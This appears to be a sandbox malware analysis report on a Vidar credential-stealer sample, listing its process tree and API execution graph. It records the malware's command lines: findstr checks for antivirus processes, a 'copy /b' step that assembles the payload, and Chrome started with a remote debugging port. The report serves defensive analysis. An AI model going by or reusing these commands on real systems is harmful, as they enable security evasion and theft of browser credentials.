                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                  Start time:11:28:37
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                                  Imagebase:0xe60000
                                                                                                                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                  Start time:11:28:37
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                  Imagebase:0x30000
                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                  Start time:11:28:38
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:tasklist
                                                                                                                                                                                                                                                  Imagebase:0xe60000
                                                                                                                                                                                                                                                  File size:79'360 bytes
                                                                                                                                                                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                  Start time:11:28:38
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                  Imagebase:0x30000
                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:23
                                                                                                                                                                                                                                                  Start time:11:28:39
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:cmd /c md 628056
                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                                  Start time:11:28:39
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:findstr /V "Cleared" Penalties
                                                                                                                                                                                                                                                  Imagebase:0x30000
                                                                                                                                                                                                                                                  File size:29'696 bytes
                                                                                                                                                                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                  Start time:11:28:39
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:cmd /c copy /b ..\Participating + ..\Produced + ..\Tvs + ..\Contractor + ..\Legislative u
                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                  Start time:11:28:39
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:Corrections.com u
                                                                                                                                                                                                                                                  Imagebase:0xf40000
                                                                                                                                                                                                                                                  File size:947'288 bytes
                                                                                                                                                                                                                                                  MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.3007890735.00000000041F9000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                                  Start time:11:28:40
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                  Imagebase:0xb60000
                                                                                                                                                                                                                                                  File size:28'160 bytes
                                                                                                                                                                                                                                                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                                  Start time:11:29:17
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                                  Start time:11:29:18
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                                  Start time:11:29:18
                                                                                                                                                                                                                                                  Start date:17/12/2024
                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2696 --field-trial-handle=2408,i,649146787284632151,17109937592652742530,262144 /prefetch:8
                                                                                                                                                                                                                                                  Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:1.3%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:14.6%
                                                                                                                                                                                                                                                    Total number of Nodes:314
                                                                                                                                                                                                                                                    Total number of Limit Nodes:15
                                                                                                                                                                                                                                                    execution_graph 35147 7ff749f919f0 VirtualProtect 35148 7ff749f8ec80 35153 7ff749f91a20 35148->35153 35150 7ff749f8ec89 35152 7ff749f8eca6 __vcrt_uninitialize_ptd 35150->35152 35157 7ff749f8eb88 35150->35157 35154 7ff749f91a31 35153->35154 35155 7ff749f91a35 35153->35155 35154->35150 35155->35154 35166 7ff749f90f78 35155->35166 35158 7ff749f8ebd1 GetLastError 35157->35158 35160 7ff749f8eba7 _get_daylight 35157->35160 35163 7ff749f8ebe4 35158->35163 35159 7ff749f8ec02 SetLastError 35161 7ff749f8ebcc 35159->35161 35160->35161 35187 7ff749f8ea08 13 API calls 2 library calls 35160->35187 35161->35152 35162 7ff749f8ebff 35162->35159 35163->35159 35163->35162 35188 7ff749f8ea08 13 API calls 2 library calls 35163->35188 35167 7ff749f91068 35166->35167 35180 7ff749f90fad __vcrt_FlsAlloc 35166->35180 35186 7ff749f8a798 EnterCriticalSection 35167->35186 35169 7ff749f90fd2 LoadLibraryExW 35172 7ff749f910f7 35169->35172 35173 7ff749f90ff7 GetLastError 35169->35173 35170 7ff749f91076 VirtualProtect 35175 7ff749f910a3 VirtualProtect 35170->35175 35176 7ff749f91124 35170->35176 35171 7ff749f91110 GetProcAddress 35171->35167 35172->35171 35174 7ff749f91107 FreeLibrary 35172->35174 35173->35180 35174->35171 35175->35176 35178 7ff749f910d0 35175->35178 35177 7ff749f8b904 BuildCatchObjectHelperInternal 38 API calls 35176->35177 35183 7ff749f91129 35177->35183 35179 7ff749f8a7f8 __crtLCMapStringW LeaveCriticalSection 35178->35179 35181 7ff749f910d7 35179->35181 35180->35167 35180->35169 35180->35171 35184 7ff749f91031 LoadLibraryExW 35180->35184 35181->35154 35182 7ff749f91164 35182->35154 35183->35182 35185 7ff749f90f78 __crtLCMapStringW 38 API calls 35183->35185 35184->35172 35184->35180 35185->35182 35187->35161 35188->35162 35189 7ff749f7849c 35210 7ff749f77f00 35189->35210 35192 7ff749f785e8 35246 7ff749f78b00 7 API calls 2 library calls 35192->35246 35193 7ff749f784b8 35195 7ff749f785f2 35193->35195 35199 7ff749f784d6 __scrt_release_startup_lock 35193->35199 35247 7ff749f78b00 7 API calls 2 library calls 35195->35247 35197 7ff749f784fb 35198 7ff749f785fd BuildCatchObjectHelperInternal 35199->35197 35200 7ff749f78581 35199->35200 35245 7ff749f8bd84 38 API calls __GSHandlerCheck_EH 35199->35245 35216 7ff749f78c48 35200->35216 35202 7ff749f78586 35219 7ff749f52410 GetCommandLineW 35202->35219 35211 7ff749f77f08 35210->35211 35212 7ff749f77f14 __scrt_dllmain_crt_thread_attach 35211->35212 35213 7ff749f77f1d 35212->35213 35214 7ff749f77f21 35212->35214 35213->35192 35213->35193 35214->35213 35248 7ff749f79f08 7 API calls 2 library calls 35214->35248 35249 7ff749f9d380 35216->35249 35220 7ff749f5244e 35219->35220 35251 7ff749f44890 LocalAlloc 35220->35251 35222 7ff749f5245e 35252 7ff749f48be0 35222->35252 35224 7ff749f524b6 35260 7ff749f51160 LocalAlloc LocalAlloc 35224->35260 35226 7ff749f524d6 35261 7ff749f514c0 35226->35261 35228 7ff749f524e8 35266 7ff749f495b0 35228->35266 35232 7ff749f5250e 35295 7ff749f4b3f0 35232->35295 35234 7ff749f52564 35235 7ff749f43700 std::exception_ptr::_Current_exception 54 API calls 35234->35235 35236 7ff749f52570 35235->35236 35237 7ff749f525b5 35236->35237 35238 7ff749f525c2 35236->35238 35320 7ff749f51aa0 CreateFileW SetFilePointer WriteFile CloseHandle 35237->35320 35301 7ff749f43aa0 35238->35301 35241 7ff749f525c1 35241->35238 35245->35200 35246->35195 35247->35198 35248->35213 35250 7ff749f78c5f GetStartupInfoW 35249->35250 35250->35202 35251->35222 35255 7ff749f48c35 35252->35255 35253 7ff749f48d19 35254 7ff749f77d50 ctype 8 API calls 35253->35254 35257 7ff749f48d28 35254->35257 35255->35253 35256 7ff749f48d05 35255->35256 35321 7ff749f77d50 35256->35321 35257->35224 35260->35226 35262 7ff749f5193f 35261->35262 35263 7ff749f514c9 35261->35263 35262->35228 35263->35262 35264 7ff749f51958 RegOpenKeyExW 35263->35264 35264->35262 35265 7ff749f5197f RegQueryValueExW 35264->35265 35265->35262 35332 7ff749f42710 35266->35332 35268 7ff749f495d8 35337 7ff749f49ec0 35268->35337 35273 7ff749f43700 35274 7ff749f43745 35273->35274 35275 7ff749f43713 35273->35275 35274->35232 35276 7ff749f43737 35275->35276 35277 7ff749f4375c 35275->35277 35276->35274 35278 7ff749f4373f LocalFree 35276->35278 35400 7ff749f7de24 38 API calls 2 library calls 35277->35400 35278->35274 35296 7ff749f4b402 35295->35296 35297 7ff749f4b409 35295->35297 35296->35234 35298 7ff749f4b413 __vcrt_FlsAlloc 35297->35298 35401 7ff749f83540 46 API calls 5 library calls 35297->35401 35298->35234 35300 7ff749f4b427 35300->35234 35302 7ff749f43ae9 35301->35302 35303 7ff749f43ab7 35301->35303 35315 7ff749f525e0 35302->35315 35304 7ff749f43adb 35303->35304 35306 7ff749f43b00 35303->35306 35304->35302 35305 7ff749f43ae3 LocalFree 35304->35305 35305->35302 35402 7ff749f7de24 38 API calls 2 library calls 35306->35402 35316 7ff749f525fb LocalFree 35315->35316 35317 7ff749f52601 35315->35317 35316->35317 35318 7ff749f525d6 ExitProcess 35317->35318 35319 7ff749f52614 LocalFree 35317->35319 35319->35318 35320->35241 35322 7ff749f77d59 35321->35322 35323 7ff749f48d14 35322->35323 35324 7ff749f78140 IsProcessorFeaturePresent 35322->35324 35323->35224 35325 7ff749f78158 35324->35325 35330 7ff749f78338 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 35325->35330 35327 7ff749f7816b 35331 7ff749f78104 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 35327->35331 35330->35327 35333 7ff749f42746 35332->35333 35336 7ff749f4275c BuildCatchObjectHelperInternal 35333->35336 35388 7ff749f43280 40 API calls 35333->35388 35336->35268 35338 7ff749f49f22 __vcrt_FlsAlloc 35337->35338 35345 7ff749f49f63 35338->35345 35353 7ff749f4a126 __vcrt_FlsAlloc 35338->35353 35339 7ff749f4a30f 35344 7ff749f77d50 ctype 8 API calls 35339->35344 35340 7ff749f4a364 35392 7ff749f443a0 40 API calls 35340->35392 35342 7ff749f4a301 35342->35339 35347 7ff749f4a309 LocalFree 35342->35347 35343 7ff749f4a117 35343->35339 35343->35342 35374 7ff749f4a35e 35343->35374 35348 7ff749f495e6 35344->35348 35345->35340 35389 7ff749f4a6c0 46 API calls BuildCatchObjectHelperInternal 35345->35389 35346 7ff749f4a36a 35393 7ff749f7de24 38 API calls 2 library calls 35346->35393 35347->35339 35375 7ff749f4a390 35348->35375 35353->35343 35356 7ff749f4a382 35353->35356 35366 7ff749f4a205 LocalFree 35353->35366 35368 7ff749f4a20b 35353->35368 35371 7ff749f4a37c 35353->35371 35354 7ff749f49fc7 35355 7ff749f4a370 35354->35355 35358 7ff749f4a049 35354->35358 35364 7ff749f4a043 LocalFree 35354->35364 35394 7ff749f7de24 38 API calls 2 library calls 35355->35394 35397 7ff749f7de24 38 API calls 2 library calls 35356->35397 35358->35346 35361 7ff749f4a0bd 35358->35361 35363 7ff749f4a0af LocalFree 35358->35363 35361->35343 35362 7ff749f4a376 35361->35362 35365 7ff749f4a109 LocalFree 35361->35365 35395 7ff749f7de24 38 API calls 2 library calls 35362->35395 35363->35361 35364->35358 35365->35343 35366->35368 35368->35343 35369 7ff749f4a280 35368->35369 35372 7ff749f4a359 35368->35372 35369->35343 35370 7ff749f4a285 LocalFree 35369->35370 35370->35343 35396 7ff749f443a0 40 API calls 35371->35396 35390 7ff749f7de24 38 API calls 2 library calls 35372->35390 35391 7ff749f7de24 38 API calls 2 library calls 35374->35391 35376 7ff749f4a616 35375->35376 35387 7ff749f4a3fb BuildCatchObjectHelperInternal 35375->35387 35377 7ff749f4a652 35376->35377 35379 7ff749f4a644 35376->35379 35381 7ff749f4a6ac 35376->35381 35378 7ff749f77d50 ctype 8 API calls 35377->35378 35380 7ff749f495f2 35378->35380 35379->35377 35382 7ff749f4a64c LocalFree 35379->35382 35380->35273 35399 7ff749f7de24 38 API calls 2 library calls 35381->35399 35382->35377 35384 7ff749f4a6a7 35398 7ff749f443a0 40 API calls 35384->35398 35387->35376 35387->35384 35389->35354 35401->35300 35403 7ff749f8c414 35404 7ff749f8c42d 35403->35404 35405 7ff749f8c424 35403->35405 35405->35404 35409 7ff749f8c14c 35405->35409 35410 7ff749f8c165 35409->35410 35412 7ff749f8c161 35409->35412 35423 7ff749f950d8 GetEnvironmentStringsW 35410->35423 35412->35404 35422 7ff749f8c320 14 API calls 3 library calls 35412->35422 35414 7ff749f8c172 35430 7ff749f8e5c0 13 API calls 2 library calls 35414->35430 35415 7ff749f8c17e 35431 7ff749f8c1bc 38 API calls 5 library calls 35415->35431 35418 7ff749f8c186 35432 7ff749f8e5c0 13 API calls 2 library calls 35418->35432 35420 7ff749f8c1a5 35433 7ff749f8e5c0 13 API calls 2 library calls 35420->35433 35422->35404 35424 7ff749f8c16a 35423->35424 35425 7ff749f950fc 35423->35425 35424->35414 35424->35415 35425->35425 35434 7ff749f8ed00 35425->35434 35427 7ff749f95133 BuildCatchObjectHelperInternal 35441 7ff749f8e5c0 13 API calls 2 library calls 35427->35441 35429 7ff749f95153 FreeEnvironmentStringsW 35429->35424 35430->35412 35431->35418 35432->35420 35433->35412 35435 7ff749f8ed0f _Wcsftime 35434->35435 35436 7ff749f8ed4b 35434->35436 35435->35436 35437 7ff749f8ed32 HeapAlloc 35435->35437 35442 7ff749f95700 EnterCriticalSection LeaveCriticalSection _Wcsftime 35435->35442 35443 7ff749f7dfdc 13 API calls _get_daylight 35436->35443 35437->35435 35439 7ff749f8ed49 35437->35439 35439->35427 35441->35429 35442->35435 35443->35439 35444 7ff749f46ac0 35495 7ff749f457f0 GetCurrentProcess OpenProcessToken 35444->35495 35446 7ff749f46b12 35447 7ff749f46b42 CoInitializeEx CoCreateInstance 35446->35447 35448 7ff749f46b16 35446->35448 35450 7ff749f46b8e VariantInit 35447->35450 35457 7ff749f46b86 35447->35457 35500 7ff749f472b0 103 API calls 2 library calls 35448->35500 35453 7ff749f46be4 35450->35453 35451 7ff749f46b3d 35452 7ff749f471c8 35451->35452 35455 7ff749f77d50 ctype 8 API calls 35452->35455 35456 7ff749f46bf0 IUnknown_QueryService 35453->35456 35460 7ff749f46be8 VariantClear 35453->35460 35454 7ff749f471c2 CoUninitialize 35454->35452 35458 7ff749f471db 35455->35458 35456->35460 35461 7ff749f46c23 35456->35461 35457->35452 35457->35454 35460->35457 35461->35460 35462 7ff749f46c84 IUnknown_QueryInterface_Proxy 35461->35462 35462->35460 35463 7ff749f46cb6 35462->35463 35463->35460 35464 7ff749f46ce2 IUnknown_QueryInterface_Proxy 35463->35464 35464->35460 35465 7ff749f46d14 CoAllowSetForegroundWindow 35464->35465 35466 7ff749f46d2d SysAllocString 35465->35466 35467 7ff749f46faf SysAllocString 35465->35467 35468 7ff749f46d5a SysAllocString 35466->35468 35469 7ff749f46d51 35466->35469 35470 7ff749f471f5 35467->35470 35483 7ff749f46e34 35467->35483 35471 7ff749f46d78 35468->35471 35472 7ff749f46d81 VariantInit 35468->35472 35469->35468 35479 7ff749f47205 35469->35479 35505 7ff749f417d0 LocalFree RtlPcToFileHeader RaiseException Concurrency::cancel_current_task std::exception_ptr::_Current_exception 35470->35505 35471->35472 35471->35479 35472->35483 35474 7ff749f471ff 35506 7ff749f7de24 38 API calls 2 library calls 35474->35506 35476 7ff749f470bd VariantClear VariantClear VariantClear VariantClear SysFreeString 35476->35460 35477 7ff749f46ff0 OpenProcess WaitForSingleObject 35481 7ff749f47025 GetExitCodeProcess 35477->35481 35477->35483 35478 7ff749f470ba 35478->35476 35507 7ff749f7de24 38 API calls 2 library calls 35479->35507 35481->35483 35483->35474 35483->35476 35483->35477 35483->35478 35484 7ff749f47042 CloseHandle 35483->35484 35486 7ff749f4709b LocalFree 35483->35486 35489 7ff749f46e7d 35483->35489 35484->35483 35486->35483 35489->35477 35489->35479 35489->35483 35490 7ff749f46f1e LocalFree 35489->35490 35491 7ff749f471ef 35489->35491 35492 7ff749f46f7e LocalFree 35489->35492 35501 7ff749f43b80 43 API calls 2 library calls 35489->35501 35502 7ff749f45a80 73 API calls 2 library calls 35489->35502 35503 7ff749f464a0 10 API calls 35489->35503 35490->35489 35504 7ff749f7de24 38 API calls 2 library calls 35491->35504 35492->35489 35496 7ff749f4581a 35495->35496 35497 7ff749f4581f GetTokenInformation 35495->35497 35496->35446 35498 7ff749f45867 CloseHandle 35497->35498 35499 7ff749f4585f 35497->35499 35498->35446 35499->35498 35500->35451 35501->35489 35502->35489 35503->35489 35505->35474 35508 7ff749f47d60 35511 7ff749f47d90 GetTokenInformation 35508->35511 35512 7ff749f47deb GetLastError 35511->35512 35513 7ff749f47d7a 35511->35513 35512->35513 35514 7ff749f47df6 35512->35514 35515 7ff749f47e45 GetTokenInformation 35514->35515 35516 7ff749f47e20 35514->35516 35518 7ff749f47e0c memcpy_s 35514->35518 35515->35513 35520 7ff749f47f90 49 API calls 4 library calls 35516->35520 35518->35515 35519 7ff749f47e2b 35519->35515 35520->35519 35521 7ff749f783b0 35522 7ff749f783c0 35521->35522 35538 7ff749f8cbbc 35522->35538 35524 7ff749f783cc 35544 7ff749f77f3c 35524->35544 35526 7ff749f78439 35537 7ff749f78455 35526->35537 35576 7ff749f78b00 7 API calls 2 library calls 35526->35576 35528 7ff749f783e4 _RTC_Initialize 35528->35526 35549 7ff749f780ec 35528->35549 35529 7ff749f78465 35531 7ff749f783f9 35552 7ff749f8bfd0 35531->35552 35535 7ff749f7840e 35536 7ff749f8d1a8 38 API calls 35535->35536 35536->35526 35539 7ff749f8cbcd 35538->35539 35543 7ff749f8cbd5 35539->35543 35577 7ff749f7dfdc 13 API calls _get_daylight 35539->35577 35541 7ff749f8cbe4 35578 7ff749f7de04 38 API calls _invalid_parameter_noinfo 35541->35578 35543->35524 35545 7ff749f77f4d 35544->35545 35548 7ff749f77f52 __scrt_release_startup_lock 35544->35548 35545->35548 35579 7ff749f78b00 7 API calls 2 library calls 35545->35579 35547 7ff749f77fc6 35548->35528 35580 7ff749f780b0 35549->35580 35551 7ff749f780f5 35551->35531 35553 7ff749f8bff0 35552->35553 35554 7ff749f78405 35552->35554 35555 7ff749f8bff8 35553->35555 35556 7ff749f8c00e GetModuleFileNameW 35553->35556 35554->35526 35575 7ff749f78e10 InitializeSListHead 35554->35575 35585 7ff749f7dfdc 13 API calls _get_daylight 35555->35585 35560 7ff749f8c039 35556->35560 35558 7ff749f8bffd 35586 7ff749f7de04 38 API calls _invalid_parameter_noinfo 35558->35586 35587 7ff749f8bf70 13 API calls 2 library calls 35560->35587 35562 7ff749f8c079 35563 7ff749f8c081 35562->35563 35565 7ff749f8c092 35562->35565 35588 7ff749f7dfdc 13 API calls _get_daylight 35563->35588 35567 7ff749f8c0f7 35565->35567 35568 7ff749f8c0de 35565->35568 35573 7ff749f8c086 35565->35573 35591 7ff749f8e5c0 13 API calls 2 library calls 35567->35591 35589 7ff749f8e5c0 13 API calls 2 library calls 35568->35589 35570 7ff749f8c0e7 35590 7ff749f8e5c0 13 API calls 2 library calls 35570->35590 35592 7ff749f8e5c0 13 API calls 2 library calls 35573->35592 35574 7ff749f8c0f3 35574->35554 35576->35529 35577->35541 35578->35543 35579->35547 35581 7ff749f780ca 35580->35581 35583 7ff749f780c3 std::exception_ptr::_Current_exception 35580->35583 35584 7ff749f8c858 41 API calls std::exception_ptr::_Current_exception 35581->35584 35583->35551 35584->35583 35585->35558 35586->35554 35587->35562 35588->35573 35589->35570 35590->35574 35591->35573 35592->35554

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00007FF749F46AC0 Relevance: 42.5, APIs: 28, Instructions: 480comCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
